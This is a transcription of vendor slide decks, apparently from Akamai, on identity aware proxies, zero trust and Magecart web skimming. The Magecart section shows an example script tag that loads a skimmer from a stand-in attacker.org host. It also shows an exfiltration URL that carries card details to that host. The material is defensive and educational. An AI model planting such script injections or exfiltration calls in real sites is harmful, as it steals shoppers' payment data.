Access Denied! Decoding Identity Aware Proxies

Similar documents
AKAMAI WHITE PAPER. Enterprise Application Access Architecture Overview

Integrating Okta and Preempt Detecting and Preventing Threats With Greater Visibility and Proactive Enforcement

Today s workforce is Mobile. Cloud and SaaSbased. are being deployed and used faster than ever. Most applications are Web-based apps

INCREASE APPLICATION SECURITY FOR PCI DSS VERSION 3.1 SUCCESS AKAMAI SOLUTIONS BRIEF INCREASE APPLICATION SECURITY FOR PCI DSS VERSION 3.

Deploying Tableau at Enterprise Scale in the Cloud

News and Updates June 1, 2017

Course Outline Topic 1: Current State Assessment, Security Operations Centers, and Security Architecture

Introduction. The Safe-T Solution

Installing and Configuring VMware Identity Manager Connector (Windows) OCT 2018 VMware Identity Manager VMware Identity Manager 3.

App Gateway Deployment Guide

PrecisionAccess Trusted Access Control

IBM Secure Proxy. Advanced edge security for your multienterprise. Secure your network at the edge. Highlights

DATACENTER MANAGEMENT Goodbye ADFS, Hello Modern Authentication! Osman Akagunduz

Identiteettien hallinta ja sovellusturvallisuus. Timo Lohenoja, CISPP Systems Engineer, F5 Networks

Understanding of basic networking concepts (routing, switching, VLAN, firewall functionality)

Citrix Workspace. Lausanne Laurent Strauss Christophe Beaugrand

Hybrid Identity de paraplu in de cloud

Inside Symantec O 3. Sergi Isasi. Senior Manager, Product Management. SR B30 - Inside Symantec O3 1

Configure Unsanctioned Device Access Control

How your network can take on the cloud and win. Think beyond traditional networking toward a secure digital perimeter

SOLUTION BRIEF. Enabling and Securing Digital Business in API Economy. Protect APIs Serving Business Critical Applications

AKAMAI CLOUD SECURITY SOLUTIONS

ArcGIS Enterprise Security: An Introduction. Randall Williams Esri PSIRT

Cloud Security Best Practices

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

WHITEPAPER ATTIVO NETWORKS THREATDEFEND PLATFORM AND THE MITRE ATT&CK MATRIX

GOING WHERE NO WAFS HAVE GONE BEFORE

Cato Cloud. Software-defined and cloud-based secure enterprise network. Solution Brief

How to Apply a Zero-Trust Model to Cloud, Data and Identity

Security Landscape Thorsten Stoeterau Security Systems Engineer - Barracuda Networks

Joe Stocker, CISSP, MCITP, VTSP Patriot Consulting

Cloud Native Security. OpenShift Commons Briefing

En partenariat avec CA Technologies. Genève, Hôtel Warwick,

ADC im Cloud - Zeitalter

AT&T Endpoint Security

THE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION BREACH & ATTACK SIMULATION

Integrating AirWatch and VMware Identity Manager

VMware Tunnel on Windows. VMware Workspace ONE UEM 1810

Coordinated Threat Control

Integration Patterns for Legacy Applications

VMware Tunnel Guide for Windows

Extending the browser to secure applications

Passwords Are Dead. Long Live Multi-Factor Authentication. Chris Webber, Security Strategist

Security Information & Policies

Defend Your Web Applications Against the OWASP Top 10 Security Risks. Speaker Name, Job Title

BIG-IP V11.3: PRODUCT UPDATE. David Perodin Field Systems Engineer III

Okta Integration Guide for Web Access Management with F5 BIG-IP

SONICWALL SECURITY HEALTH CHECK SERVICE

GLOBALPROTECT. Key Usage Scenarios and Benefits. Remote Access VPN Provides secure access to internal and cloud-based business applications

SAP Security in a Hybrid World. Kiran Kola

A different approach to Application Security

VMware Identity Manager Cloud Deployment. DEC 2017 VMware AirWatch 9.2 VMware Identity Manager

SONICWALL SECURITY HEALTH CHECK SERVICE

VMware Identity Manager Cloud Deployment. Modified on 01 OCT 2017 VMware Identity Manager

VMware Tunnel Guide Deploying the VMware Tunnel for your AirWatch environment

Cybersecurity Roadmap: Global Healthcare Security Architecture

Related Labs: Introduction to Universal Access and F5 SAML IDP (Self-paced)

Seceon s Open Threat Management software

VMWARE HORIZON CLOUD WITH VMWARE IDENTITY MANAGER QUICK START GUIDE WHITE PAPER MARCH 2018

Vodafone Secure Network Gateway

Magento Commerce Architecture and Security Model Last updated: Aug 2017

SONICWALL SECURITY HEALTH CHECK PSO 2017

CompTIA Exam CAS-002 CompTIA Advanced Security Practitioner (CASP) Version: 6.0 [ Total Questions: 532 ]

NETWORK FORENSIC ANALYSIS IN THE AGE OF CLOUD COMPUTING.

A. The portal will function as an identity provider and issue an authentication assertion

Chapter 9. Firewalls

Cato Cloud. Solution Brief. Software-defined and Cloud-based Secure Enterprise Network NETWORK + SECURITY IS SIMPLE AGAIN

Klaudia Bakšová System Engineer Cisco Systems. Cisco Clean Access

WHITE PAPER AIRWATCH SUPPORT FOR OFFICE 365

VMware Tunnel Guide for Windows Installing the VMware Tunnel for your AirWatch environment

O365 Solutions. Three Phase Approach. Page 1 34

Deploying VMware Identity Manager in the DMZ. JULY 2018 VMware Identity Manager 3.2

Guide to Deploying VMware Workspace ONE. DEC 2017 VMware AirWatch 9.2 VMware Identity Manager 3.1

Managing Your Privileged Identities: The Choke Point of Advanced Attacks

Guide to Deploying VMware Workspace ONE. VMware Identity Manager VMware AirWatch 9.1

Microsoft Microsoft TS: MS Internet Security & Acceleration Server 2006, Configuring. Practice Test. Version:

ShareFile Technical Presentation

SAS and F5 integration at F5 Networks. Updates for Version 11.6

Security Readiness Assessment

ACS-3921/ Computer Security And Privacy. Chapter 9 Firewalls and Intrusion Prevention Systems

85% 89% 10/5/2018. Do You Have A Firewall Around Your Cloud? Conquering The Big Threats & Challenges

Deploying Cisco ASA VPN Solutions v2.0 (VPN)

Google on BeyondCorp: Empowering employees with security for the cloud era

Paloalto Networks PCNSA EXAM

ArcGIS Online A Security, Privacy, and Compliance Overview. Andrea Rosso Michael Young

Outwit Cyber Criminals with Comprehensive Malware and Exploit Protection.

DreamFactory Security Guide

COMPUTER NETWORK SECURITY

IBM Security Access Manager

Adaptacyjny dostęp do aplikacji wszędzie i z każdego urządzenia

DEFINING SECURITY FOR TODAY S CLOUD ENVIRONMENTS. Security Without Compromise

F5 Application Security. Radovan Gibala Field Systems Engineer

VMware Workspace ONE Quick Configuration Guide. VMware AirWatch 9.1

Implementing Core Cisco ASA Security (SASAC)

Securing Your Microsoft Azure Virtual Networks

TIBCO Cloud Integration Security Overview

Best Practices in Securing a Multicloud World

DECRYPT SSL AND SSH TRAFFIC TO DISRUPT ATTACKER COMMUNICATIONS AND THEFT

PLANNING AZURE INFRASTRUCTURE SECURITY - AZURE ADMIN ACCOUNTS PROTECTION & AZURE NETWORK SECURITY

Content Security Policy

Transcription:

Access Denied! Decoding Identity Aware Proxies

Users & Corporate Apps Have Left The Building CORP NET DC App #1 App #2 The Web SaaS IaaS Existing network architectures are not optimized for this App #3 App #n DC No VPN = No Security Complex Slow Office Cafe High Risk

There is no INSIDE

Security Challenges In This Environment Larger Attack Surface Advanced Threats Security Complexity Security Skills Direct Internet Access (DIA), SaaS, cloud services, mobility, IOT all dramatically increase your attack surface Threats are becoming more complex, increasing in volume and adversaries are now adept at bypassing your defences Security complexity and control point complications has created security gaps Worldwide shortage of security talent and expertise means many security teams are stretched

Zero Trust is the new approach Key principles: The network is always assumed to be hostile. External and internal threats exist on the network at all times. Network locality is not sufficient for deciding trust in a network. Every device, user, and network flow is authenticated and authorized. Policies must be dynamic and calculated from as many sources of data as possible.

Different Approaches To Implement Zero Trust Option #1 Network Segmentation Option #2 Software Defined Perimeters Option #3 Identity Aware Proxies

Network Segmentation Software Defined Perimeters Advantages Great for Protection from East-West lateral movement Drawbacks Fragile & Complicated Expensive Shared resources used by entire Enterprise Even more complex to implement in hybrid IaaS/ On-prem Often implemented within Corp WAN Advantages Familiar: Most Similar to legacy Remote Access VPN Relatively Fast to Eliminate VPN Drawbacks Limited Architecture: A tunnel is just a tunnel Service Insertion not possible due to tunnel architecture Push Complexity with Legacy Auth down to Each Application

Identity Aware Proxy (IAP) Cloud-based Proxy architecture Identity verification and authorization occur in the cloud based on least access principles No tunnels IAP provides access to applications, whitelisted for authenticated and authorized users, at the application layer (Layer 7) Standard HTTPs or websockets over TLS Trusted Identity Store to verify users and devices Cloak the applications and assets in the cloud or behind the firewall Clientless for Web apps

Identity Aware Proxy Advantages Long Term Flexibility with Proxy Architecture Service Insertion for features like WAF, CDN, etc Auth Bridging Unify multiple Islands of Identity Future Capabilities likely to include Password Vaulting and Shared Accounts Drawbacks More of a departure for Helpdesk support compared to network centric solutions Can be more work to get started

Identity Aware Proxy (IAP) - Architecture Outbound TLS Connection From Connector to EAA Edge Enterprise Data Center Proxy Cloud Platform Apps TLS Connection User to IAP Edge IAP Edge Enterprise Access Connector APP User Admin User Customer Admin User to IAP Management Cloud TLS Connection IAP Management Cloud Outbound TLS Connection From Connector to Proxy Management Cloud APP User Proxy Cloud Platform Apps

Enterprise Access Connector Outbound Proxy Internet Enterprise Enterprise Access Edge Centrally Managed Virtual Machine Only dials out - all inbound access is denied Proxies connections to internal apps Can translate SSH, RDP/VNC to HTTP/S Communicates with your Active Directory/LDAP Apps Enterprise Access Connector Supports full ADC functionality including load balancing, custom headers, path based routing, and authentication bridging. AD / LDAP

Enterprise Access Connector - Authentication Flow Internet Enterprise Access Edge Enterprise Enterprise Access Connector 2. Akamai authenticates itself using the Akamai certificate (EAA Management) 3. Customer must approve the Connector 5. Akamai signs CSR; sends approved certificate Avoid data theft and downtime 1. Connector by extending initiates a mutually the security perimeter outside the data-center and Approval protect from increasing frequency, scale and sophistication of web attacks. TLS Connection CSR Approved Certificate authenticated TLS connection using is factory certificate (EAA Management) 4. Connector creates a CSR; sends to Akamai 6. Connector tears down existing TLS connection 8. Akamai authenticates itself using the approved certificate (EAA Management) 10. Akamai authenticates itself using the approved certificate (EAA Edge) TLS Connection TLS Connection 7. Connector initiates a mutually authenticated TLS connection using approved certificate (EAA Management) 9. Connector initiates a mutually authenticated TLS connection using approved certificate (EAA Edge)

Authentication and Authorization Internet IdP (IDaaS) (e.g. Okta, OneLogin) Enterprise AD / LDAP Apps User EAA Edge Enterprise Connector EAA Edge will authenticate the user against AD Provides Single Sign-On Capabilities Provides Multi-Factor Authentication Can integrate with IDaaS providers Supports NTLM, Kerberos, SAML, Header based Auth Seamless integration for any authentication source

User Data Path Internet Enterprise Access Edge Enterprise Enterprise Access Connector User User attempting to access application SSL sessions for configured applications End user requests access to an application Only accepts SSL traffic for configured applications. Must be from authenticated and authorized users. All other traffic is dropped.

Validate user identity to control access to assets Verified Individual -MFA OTP Identified Individual - username / password Trusted Device - client certificates AUTHENTICATION Authorised Applications

User Data Path Internet Enterprise Access Edge Enterprise Enterprise Access Connector User User attempting to access application SSL sessions for configured applications Pass user requests to application Apps End user requests access to an application Only accepts SSL traffic for configured applications. Must be from authenticated and authorized users. All other traffic is dropped. Only processes HTTP messages received over self-initiated SSL sessions. Messages may only be directed toward applications the connector is configured for. Intended application. Also provide authentication and authorization for all users.

Cloud Based - High Availability & Reliability Enterprise User Internet Global DNS Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks. Apps All components must be elastic and redundant Enterprise Access Edges Enterprise Access Connectors Customer Applications Built-in Server and Data Center Load Balancing Regional Enterprise Access Edges with Automatic Failover Redundant Enterprise Access Connectors

Identity Aware Proxy (IAP) Architecture Summary Clientless TLS EAA SAML IDP (Auth Path Only) Internet SaaS User > Browser With Client Internet EAA DPoP Auth & Data Path EAA Connector Apps VPC IaaS EAA Client User > Desktop Apps > EAA Client Auth-N,Z before connect Secured data path Integrated HA, Load balancing Multiple IDP support SSO and auth bridging Managed & Unmanaged devices EAA Connector Apps AD Data Center 18

IAP Compliments Network Segmentation Clientless TLS Segment 4 App 4 User > Browser With Client Internet EAA DPoP Segment 3 App 3 Segment 2 User > Desktop Apps > EAA Client EAA Client App 2 No limit on number or connectors Simplify Micro segmentation Network level for coarse segmentation IAP for fine grained per app segmentation Segment 1 App 1 AD Data Center 19

Moving Beyond Perimeter Security A comprehensive & achievable roadmap to less risk 8 Steps To Zero Trust 1 2 3 4 5 6 7 8 App Precheck Access Proxy Prep Test Lab Enrollment Security Upgrade Performance Upgrade External User Enrollment Internal User Enrollment VLAN Migration 8 Steps To Zero Trust A comprehensive guide & roadmap to Zero Trust by Akamai CTO Charlie Gero Zero Trust Ref. Architecture Simple visual guide on how to apply Zero Trust across common environments akamai.com/zerotrust

THANK YOU nhawkins@akamai.com https://www.linkedin.com/in/nickhawk @SingaporeNick

Magecart and Javascript skimmers code

Magecart group of criminals that have been targeting online shopping carts and skimming credit card data at checkout. Time in operation: Roughly 3 years Group Strength: Unknown, roughly operate in 6-7 groups Target industry: ecommerce (primarily) Modus operandi: Java script skimmers/malware Many of the Magecart victims are struggling to contain the attacks. In the third quarter of 2018 many Magecart victims were re-infected soon after detection and cleaning-up of the initial infection Intelligent Edge Security 2018 Akamai

Understanding Magecart (Data Skimming) Kill Chain Reconnaissance Infiltration Exploitation Exfiltration Identify target website with high account value Identify random targets Implanting server side skimmer code Implanting clientside malware/plugins Checkout page compromised Skimmer.js executes Skimming of webform such as credit card number, expiration date, name, billing add. Etc. Data packaging and exfiltration to the attacker location Intelligent Edge Security 2018 Akamai

DOORS TO DATA SKIMMING How did the script/skimmer get in?

TRUST EXPLOITATION

Authorized user injecting malicious script Insider threat - a user who legitimately has access to include scripts on the websites intentionally adds a malicious payload. Unknowingly: Valid users doing a/b tests, cms upgrades etc. open up security holes Checkout Script

Unauthorized user injecting malicious script Accidental exposure formal practices and controls are usually unaware of all of the injection points Web Attackers Stored Cross-Site Scripting (XSS) Reflected Cross-Site Scripting (XSS) Application modification using other vulnerabilities Targeting 3 rd party integration and partners

Client side Malware, Plug-ins 1 User browser making legitimate requests to vulnerable site/s Browser side logic such as compromised browser plugins can manipulate content on browser side 2 3 Card data and user info is skimmed, stored and sent to the attacker location SIGN IN BA G LOGIN CREATE ACCOUNT

How does the attack look like in real? Infiltration www.xyz.com/cart/checkout.jsp includes a piece of JavaScript <script src=www.attacker.org/credit-cardskimmer.js> Exfiltration www.attacker.org/1x1- pixel.gif?stolendata= 1234567891234 nov 2020 a%20name a%20billing% 20address Exploitation credit-card-skimmer.js runs and extracts payment details such as Card number, expiration, name and billing address User Interaction www.xyz.com/cart/checkout.jsp

EXAMPLE: INLINE JAVASCRIPT SKIMMER

EXAMPLE: INLINE JAVASCRIPT SKIMMER

DATA EXFILTRATION: INLINE JAVASCRIPT SKIMMER

EXAMPLE: EXTERNAL JAVASCRIPT SKIMMER

EXAMPLE: EXTERNAL JAVASCRIPT SKIMMER

Where do we go from here?

Zero Trust approach can help: Trust but verify Users & Apps are everywhere Trust, but verify Access only to authorized apps and resources

PROTECT YOUR SENSITIVE PAGES Login Auth + Data Path Controls Payment Profile Application layer protection Content Security Policy (CSP) and SRI Script management

CORPORATE APPLICATION MODERNIZATION Reference architecture Browser Client Attacker Edge platform 1 DDoS / WAF Identity App access App acceleration 2 3 4 5 6 Manage Corporate apps 7 Data Centre Cloud Provider X Cloud Provider Y

DEFENSE IN DEPTH - CSP AND SRI CONTROLS Content Security Policy Disallow/Selectively allow Inline/external JavaScript with script-src Use of CSP Nonces Validating Inline JavaScript with CSP Hashes Subresource Integrity (SRI) Validating External JavaScript by specifying an integrity attribute to your script calls CSP and SRI together with a new CSP directive called require-sri-for Data Exfiltration Defenses Control XMLHttpRequest (XHR) based exfiltration with CSP connect-src Control exfiltration with Image() Constructor using CSP img-src Implement CSP violation reporting

THANK YOU

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback